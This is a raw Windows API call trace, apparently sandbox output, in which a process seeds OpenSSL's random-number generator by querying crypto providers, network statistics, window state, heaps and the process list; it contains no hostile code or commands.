RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x35748a0 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3abd408 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd420 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e348 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd438 [0174.008] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x3574880 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3abd450 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd468 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd480 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e4b0 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd498 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd4b0 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd4c8 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd4e0 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x3aa7490 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x35707c8 [0174.009] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x35707c8, Size=0x218) returned 0x32b988 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3aa2818 [0174.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3abd4b0 | out: hHeap=0x2c0000) returned 1 [0174.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3abd4e0 | out: hHeap=0x2c0000) returned 1 [0174.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3abd4c8 | out: hHeap=0x2c0000) returned 1 [0174.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa7490 | out: hHeap=0x2c0000) returned 1 [0174.009] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd4c8 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x354b298 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x3abd4e0 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x35748c0 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x3abd4b0 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x354b2a8 [0174.009] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x312a48 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a58a20 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x3aa8da0 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x35748e0 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x312b60 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x3574900 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x354b2b8 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x312a48 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3abd4e0 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354b2a8 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3abd4b0 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35748c0 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x354b298 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3abd4c8 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a58a20 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa8c20 | out: hHeap=0x2c0000) returned 1 [0174.010] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b988 | out: hHeap=0x2c0000) returned 1 [0174.010] GetCurrentThreadId () returned 0xab0 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x190) returned 0x3ac71f0 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x3aa03f0 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3a9e4f8 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x3abd4c8 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3a5a700 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x320be8 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x3aca1b8 [0174.010] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31eaa0 [0174.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x35efe98 [0174.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x354b298 [0174.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x354b2a8 [0174.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3a5a808 [0174.011] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b40b0 [0174.011] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b40b0 | out: hHeap=0x2c0000) returned 1 [0174.011] GetCurrentThreadId () returned 0xab0 [0174.011] GetVersionExA (in: lpVersionInformation=0xa13f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x48, dwMinorVersion=0xa13f3a8, dwBuildNumber=0x420cab, dwPlatformId=0x0, szCSDVersion="þBE") | out: lpVersionInformation=0xa13f380*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0174.011] LoadLibraryA (lpLibFileName="ADVAPI32.DLL") returned 0x77710000 [0174.011] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76d30000 [0174.012] LoadLibraryA (lpLibFileName="NETAPI32.DLL") returned 0x740b0000 [0174.018] GetProcAddress (hModule=0x740b0000, lpProcName="NetStatisticsGet") returned 0x740b644f [0174.018] GetProcAddress (hModule=0x740b0000, lpProcName="NetApiBufferFree") returned 0x741013d2 [0174.018] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c18, Level=0x0, Options=0x0, Buffer=0xa13f02c | out: Buffer=0xa13f02c) returned 0x0 [0174.424] GetCurrentThreadId () returned 0xab0 [0174.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.424] NetApiBufferFree (Buffer=0x3a5d598) returned 0x0 [0174.424] NetStatisticsGet (in: ServerName=0x0, Service=0x4f6c3c, Level=0x0, Options=0x0, Buffer=0xa13f02c | out: Buffer=0xa13f02c) returned 0x0 [0174.427] GetCurrentThreadId () returned 0xab0 [0174.427] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.427] NetApiBufferFree (Buffer=0x3aa8c20) returned 0x0 [0174.427] FreeLibrary (hLibModule=0x740b0000) returned 1 [0174.432] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0174.432] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0174.432] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0174.432] CryptAcquireContextW (in: phProv=0xa13f018, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0xa13f018*=0x31eb28) returned 1 [0174.433] CryptGenRandom (in: hProv=0x31eb28, dwLen=0x40, pbBuffer=0xa13f464 | out: pbBuffer=0xa13f464) returned 1 [0174.434] GetCurrentThreadId () returned 0xab0 [0174.434] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.434] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.434] CryptReleaseContext (hProv=0x31eb28, dwFlags=0x0) returned 1 [0174.434] CryptAcquireContextW (in: phProv=0xa13f018, szContainer=0x0, szProvider="Intel Hardware Cryptographic Service Provider", dwProvType=0x16, dwFlags=0x0 | out: phProv=0xa13f018*=0x31eb28) returned 0 [0174.434] FreeLibrary (hLibModule=0x77710000) returned 1 [0174.434] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0174.434] GetProcAddress (hModule=0x400000, lpProcName="_OPENSSL_isservice") returned 0x0 [0174.434] GetDesktopWindow () returned 0x10010 [0174.434] GetProcessWindowStation () returned 0x48 [0174.434] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0x0, nLength=0x0, lpnLengthNeeded=0xa13efa0 | out: pvInfo=0x0, lpnLengthNeeded=0xa13efa0) returned 0 [0174.434] GetLastError () returned 0x7a [0174.434] GetUserObjectInformationW (in: hObj=0x48, nIndex=2, pvInfo=0xa13ef80, nLength=0x10, lpnLengthNeeded=0xa13efa0 | out: pvInfo=0xa13ef80, lpnLengthNeeded=0xa13efa0) returned 1 [0174.435] LoadLibraryA (lpLibFileName="USER32.DLL") returned 0x77130000 [0174.435] GetProcAddress (hModule=0x77130000, lpProcName="GetForegroundWindow") returned 0x77152320 [0174.435] GetProcAddress (hModule=0x77130000, lpProcName="GetCursorInfo") returned 0x771a812f [0174.435] GetProcAddress (hModule=0x77130000, lpProcName="GetQueueStatus") returned 0x77153924 [0174.435] GetForegroundWindow () returned 0x10256 [0174.436] GetCurrentThreadId () returned 0xab0 [0174.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.436] GetCursorInfo (in: pci=0xa13f450 | out: pci=0xa13f450) returned 1 [0174.436] GetQueueStatus (flags=0xbf) returned 0x0 [0174.436] GetCurrentThreadId () returned 0xab0 [0174.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.436] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.436] FreeLibrary (hLibModule=0x77130000) returned 1 [0174.436] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0174.436] GetProcAddress (hModule=0x76d30000, lpProcName="CloseToolhelp32Snapshot") returned 0x0 [0174.436] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32First") returned 0x76dc5763 [0174.437] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32Next") returned 0x76dc594e [0174.437] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListFirst") returned 0x76dc5621 [0174.437] GetProcAddress (hModule=0x76d30000, lpProcName="Heap32ListNext") returned 0x76dc56cb [0174.437] GetProcAddress (hModule=0x76d30000, lpProcName="Process32First") returned 0x76d68ae7 [0174.438] GetProcAddress (hModule=0x76d30000, lpProcName="Process32Next") returned 0x76d688a4 [0174.438] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32First") returned 0x76dc5b93 [0174.438] GetProcAddress (hModule=0x76d30000, lpProcName="Thread32Next") returned 0x76dc5c3f [0174.438] GetProcAddress (hModule=0x76d30000, lpProcName="Module32First") returned 0x76dc5cd9 [0174.438] GetProcAddress (hModule=0x76d30000, lpProcName="Module32Next") returned 0x76dc5dc2 [0174.438] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0x6ec [0174.451] GetTickCount () returned 0x1172142 [0174.451] Heap32ListFirst (hSnapshot=0x6ec, lphl=0xa13f454) returned 1 [0174.451] GetCurrentThreadId () returned 0xab0 [0174.451] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.451] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.451] Heap32First (lphe=0xa13efc0, th32ProcessID=0x6c8, th32HeapID=0x2c0000) returned 1 [0174.481] GetCurrentThreadId () returned 0xab0 [0174.481] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.481] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.481] Heap32Next (lphe=0xa13efc0) returned 1 [0174.507] GetTickCount () returned 0x1172181 [0174.507] GetCurrentThreadId () returned 0xab0 [0174.507] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.507] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.507] Heap32Next (lphe=0xa13efc0) returned 1 [0174.543] GetTickCount () returned 0x11721a0 [0174.543] GetCurrentThreadId () returned 0xab0 [0174.543] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.543] Heap32Next (lphe=0xa13efc0) returned 1 [0174.570] GetTickCount () returned 0x11721bf [0174.570] GetCurrentThreadId () returned 0xab0 [0174.570] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.570] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.570] Heap32Next (lphe=0xa13efc0) returned 1 [0174.593] GetTickCount () returned 0x11721cf [0174.593] GetCurrentThreadId () returned 0xab0 [0174.593] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.593] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.593] Heap32Next (lphe=0xa13efc0) returned 1 [0174.620] GetTickCount () returned 0x11721ee [0174.620] GetCurrentThreadId () returned 0xab0 [0174.620] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.620] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.620] Heap32Next (lphe=0xa13efc0) returned 1 [0174.644] GetTickCount () returned 0x11721fe [0174.644] GetCurrentThreadId () returned 0xab0 [0174.644] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.644] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.644] Heap32Next (lphe=0xa13efc0) returned 1 [0174.675] GetTickCount () returned 0x117221d [0174.675] GetCurrentThreadId () returned 0xab0 [0174.675] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.676] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.676] Heap32Next (lphe=0xa13efc0) returned 1 [0174.702] GetTickCount () returned 0x117223c [0174.702] GetCurrentThreadId () returned 0xab0 [0174.702] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.702] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.702] Heap32Next (lphe=0xa13efc0) returned 1 [0174.727] GetTickCount () returned 0x117225b [0174.727] GetCurrentThreadId () returned 0xab0 [0174.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.727] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.727] Heap32Next (lphe=0xa13efc0) returned 1 [0174.754] GetTickCount () returned 0x117226b [0174.754] GetCurrentThreadId () returned 0xab0 [0174.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.754] Heap32Next (lphe=0xa13efc0) returned 1 [0174.791] GetTickCount () returned 0x117229a [0174.791] GetCurrentThreadId () returned 0xab0 [0174.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.791] Heap32Next (lphe=0xa13efc0) returned 1 [0174.820] GetTickCount () returned 0x11722b9 [0174.820] GetCurrentThreadId () returned 0xab0 [0174.820] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.820] Heap32Next (lphe=0xa13efc0) returned 1 [0174.845] GetTickCount () returned 0x11722c8 [0174.845] GetCurrentThreadId () returned 0xab0 [0174.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.845] Heap32Next (lphe=0xa13efc0) returned 1 [0174.870] GetTickCount () returned 0x11722e8 [0174.870] GetCurrentThreadId () returned 0xab0 [0174.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.870] Heap32Next (lphe=0xa13efc0) returned 1 [0174.895] GetTickCount () returned 0x1172307 [0174.895] GetCurrentThreadId () returned 0xab0 [0174.895] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.895] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.895] Heap32Next (lphe=0xa13efc0) returned 1 [0174.920] GetTickCount () returned 0x1172316 [0174.920] GetCurrentThreadId () returned 0xab0 [0174.920] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.920] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.920] Heap32Next (lphe=0xa13efc0) returned 1 [0174.946] GetTickCount () returned 0x1172336 [0174.946] GetCurrentThreadId () returned 0xab0 [0174.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.946] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.946] Heap32Next (lphe=0xa13efc0) returned 1 [0174.971] GetTickCount () returned 0x1172345 [0174.971] GetCurrentThreadId () returned 0xab0 [0174.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0174.971] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0174.971] Heap32Next (lphe=0xa13efc0) returned 1 [0175.012] GetTickCount () returned 0x1172374 [0175.012] GetCurrentThreadId () returned 0xab0 [0175.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.012] Heap32Next (lphe=0xa13efc0) returned 1 [0175.036] GetTickCount () returned 0x1172393 [0175.036] GetCurrentThreadId () returned 0xab0 [0175.036] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.036] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.036] Heap32Next (lphe=0xa13efc0) returned 1 [0175.060] GetTickCount () returned 0x11723a3 [0175.060] GetCurrentThreadId () returned 0xab0 [0175.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.060] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.060] Heap32Next (lphe=0xa13efc0) returned 1 [0175.085] GetTickCount () returned 0x11723c2 [0175.085] GetCurrentThreadId () returned 0xab0 [0175.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.085] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.085] Heap32Next (lphe=0xa13efc0) returned 1 [0175.110] GetTickCount () returned 0x11723d2 [0175.110] GetCurrentThreadId () returned 0xab0 [0175.110] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.110] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.110] Heap32Next (lphe=0xa13efc0) returned 1 [0175.135] GetTickCount () returned 0x11723f1 [0175.135] GetCurrentThreadId () returned 0xab0 [0175.135] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.135] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.135] Heap32Next (lphe=0xa13efc0) returned 1 [0175.162] GetTickCount () returned 0x1172410 [0175.162] GetCurrentThreadId () returned 0xab0 [0175.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.163] Heap32Next (lphe=0xa13efc0) returned 1 [0175.187] GetTickCount () returned 0x1172420 [0175.187] GetCurrentThreadId () returned 0xab0 [0175.187] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.187] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.187] Heap32Next (lphe=0xa13efc0) returned 1 [0175.210] GetTickCount () returned 0x117243f [0175.210] GetCurrentThreadId () returned 0xab0 [0175.210] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.210] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.210] Heap32Next (lphe=0xa13efc0) returned 1 [0175.236] GetTickCount () returned 0x117244e [0175.236] GetCurrentThreadId () returned 0xab0 [0175.236] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.236] Heap32Next (lphe=0xa13efc0) returned 1 [0175.261] GetTickCount () returned 0x117246e [0175.261] GetCurrentThreadId () returned 0xab0 [0175.261] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.261] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.261] Heap32Next (lphe=0xa13efc0) returned 1 [0175.287] GetTickCount () returned 0x117248d [0175.287] GetCurrentThreadId () returned 0xab0 [0175.287] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.287] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.287] Heap32Next (lphe=0xa13efc0) returned 1 [0175.311] GetTickCount () returned 0x117249c [0175.311] GetCurrentThreadId () returned 0xab0 [0175.311] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.311] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.311] Heap32Next (lphe=0xa13efc0) returned 1 [0175.339] GetTickCount () returned 0x11724bc [0175.339] GetCurrentThreadId () returned 0xab0 [0175.339] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.339] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.339] Heap32Next (lphe=0xa13efc0) returned 1 [0175.365] GetTickCount () returned 0x11724db [0175.365] GetCurrentThreadId () returned 0xab0 [0175.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.365] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.365] Heap32Next (lphe=0xa13efc0) returned 1 [0175.391] GetTickCount () returned 0x11724ea [0175.391] GetCurrentThreadId () returned 0xab0 [0175.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.391] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.391] Heap32Next (lphe=0xa13efc0) returned 1 [0175.419] GetTickCount () returned 0x117250a [0175.419] GetCurrentThreadId () returned 0xab0 [0175.419] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.419] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.419] Heap32Next (lphe=0xa13efc0) returned 1 [0175.443] GetTickCount () returned 0x1172529 [0175.443] GetCurrentThreadId () returned 0xab0 [0175.443] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x3b4040 [0175.443] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b4040 | out: hHeap=0x2c0000) returned 1 [0175.443] Heap32Next (lphe=0xa13efc0) returned 1 [0175.472] GetTickCount () returned 0x1172538 [0175.472] Heap32ListNext (hSnapshot=0x6ec, lphl=0xa13f454) returned 1 [0175.472] GetTickCount () returned 0x1172548 [0175.472] GetTickCount () returned 0x1172548 [0175.472] Process32First (in: hSnapshot=0x6ec, lppe=0xa13f258 | out: lppe=0xa13f258*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0175.474] GetCurrentThreadId () returned 0xab0 [0175.474] 